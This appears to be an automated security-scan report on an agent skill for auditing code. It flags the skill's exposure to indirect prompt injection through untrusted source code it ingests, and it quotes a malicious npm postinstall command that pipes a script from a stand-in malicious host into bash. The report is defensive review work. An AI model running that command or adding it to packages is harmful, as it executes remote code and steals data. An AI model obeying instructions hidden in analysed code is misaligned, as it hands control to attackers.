The Agent Skills Directory

[PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection during its core auditing workflow.
Ingestion points: The skill ingests untrusted source code provided by the user for analysis in Phase 1 (Discover), as described in SKILL.md.
Boundary markers: The instructions do not specify the use of delimiters or boundary markers (such as XML tags or specific 'ignore embedded instructions' warnings) to encapsulate the user-provided code.
Capability inventory: The agent has the capability to generate detailed security reports and suggest code modifications based on the content of the analyzed files.
Sanitization: There is no mention of sanitization or filtering of the input code before it is processed by the agent.
[REMOTE_CODE_EXECUTION]: The skill contains a pattern for remote code execution via external scripts.
Evidence: In references/dependency-security.md, a JSON snippet contains "postinstall": "curl http://malicious-site.com/steal.sh | bash".
Context: This is provided as an explicit example of a malicious anti-pattern that should 'NEVER' be used. However, the URL used in the example is identified as malicious by security scanners.
[EXTERNAL_DOWNLOADS]: The skill references external security resources on GitHub.
Evidence: README.md contains links to external security skills repositories at github.com/hoodini and github.com/sickn33.
Context: These references are used for further research and documentation.

accelint-security-best-practices